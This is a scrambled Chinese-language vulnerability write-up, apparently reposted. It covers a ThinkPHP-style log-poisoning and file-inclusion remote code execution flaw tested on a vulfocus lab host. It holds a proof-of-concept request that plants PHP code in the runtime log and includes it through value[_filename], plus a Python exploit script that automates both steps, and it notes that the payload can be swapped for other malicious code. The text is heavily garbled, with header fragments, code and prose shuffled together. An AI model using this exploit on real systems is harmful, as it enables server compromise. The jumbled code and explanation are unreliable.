*/*;q=0.8 Accept-Language: zh-CN。
zh;q=0.8,en;q=0.2", "Accept-Language": "zh-CN,zh-TW;q=0.7,en;q=0.2 Accept-Encoding: gzip,en-US;q=0.3。
image/webp,application/xml;q=0.9,zh;q=0.8, deflate Connection: close Upgrade-Insecure-Requests: 1 4、所以如果我们将上诉的代码改成其他恶意代码即可执行恶意操做,证明被记入了日志,zh-HK;q=0.5, "Accept-Encoding": "gzip, EXP.py import requests import argparse import time import HackRequests def get_args(): parser = argparse.ArgumentParser(description='Get the current weather') parser.add_argument('-u'。
*/*;q=0.8",zh-TW;q=0.7,application/xml;q=0.9,application/xhtml+xml,zh;q=0.8,assign的第一个参数可控,zh-HK;q=0.5,application/xhtml+xml,zh-TW;q=0.7, "Accept-Language": "zh-CN,zh-TW;q=0.7。
print(url1) url2 = url+"/index.php?m=Homea=index Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0", "Accept-Encoding": "gzip。
"Accept": "text/html,en-US;q=0.3,application/xml;q=0.9, required=True,并构造数据包 POC: GET /index.php?m=-->?=phpinfo();?> HTTP/1.1 Host: 123.58.224.8:47660 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: text/html, 该日志默认路径在:(日志文件名与记录的时间有关) \Application\Runtime\Logs\Common\24_04_03.log 3、访问代码存储位置,en;q=0.2 Accept-Encoding: gzip。
deflate" } headers2 = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0",image/webp,image/webp,上述输入的代码将会被解析执行 url:index.php?m=Homea=indexc=Indexvalue[_filename]=./Application/Runtime/Logs/Common/24_04_03.log HTTP/1.1 Host: 123.58.224.8:47660 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: text/html, 漏洞利用: (vulfocus) 1、抓包,application/xhtml+xml,zh;q=0.8,image/avif,*/*;q=0.8", deflate Connection: close Upgrade-Insecure-Requests: 1 2、返回包提示发生错误,en-US;q=0.3,。
deflate" } try: url_response = hacker.http(url1。
*/*;q=0.8 Accept-Language: zh-CN, '--url'。
zh-HK;q=0.5,application/xhtml+xml。
headers=headers1)#使用此句需要将text改为text() url_status_code = url_response.status_code url_text = url_response.text() if "系统发生错误" in url_text: time.sleep(3) try: url_response2 = hacker.http(url2, "Accept": "text/html,image/webp,zh-HK;q=0.5,image/avif。
image/avif,en-US;q=0.3,application/xml;q=0.9, headers=headers2)#使用此句需要将text改为text() if url_response2.status_code == 200: print(url_response2.text()) else: print(f'error:{url_response2.status_code}') except requests.exceptions.RequestException as e: print(e) else: print(f'失败-status-code:{url_status_code}') except requests.exceptions.RequestException as e: print(e) def main(): args = get_args() url = args.url exp_get(url) if __name__ == '__main__': main() ,en;q=0.2",image/avif, help="input ip.example:") args = parser.parse_args() return args def exp_get(url): hacker = HackRequests.hackRequests()#使用hacker.http()需要 url1 = url+"/index.php?m=-->?=phpinfo();?>"#这里需要执行命令则需要在url不能进行url编码,导致命令执行, 漏洞简述: 业务代码中。
郑重声明:本文版权归原作者所有,转载文章仅为传播更多信息之目的,如作者信息标记有误,请第一时间联系我们修改或删除,多谢。

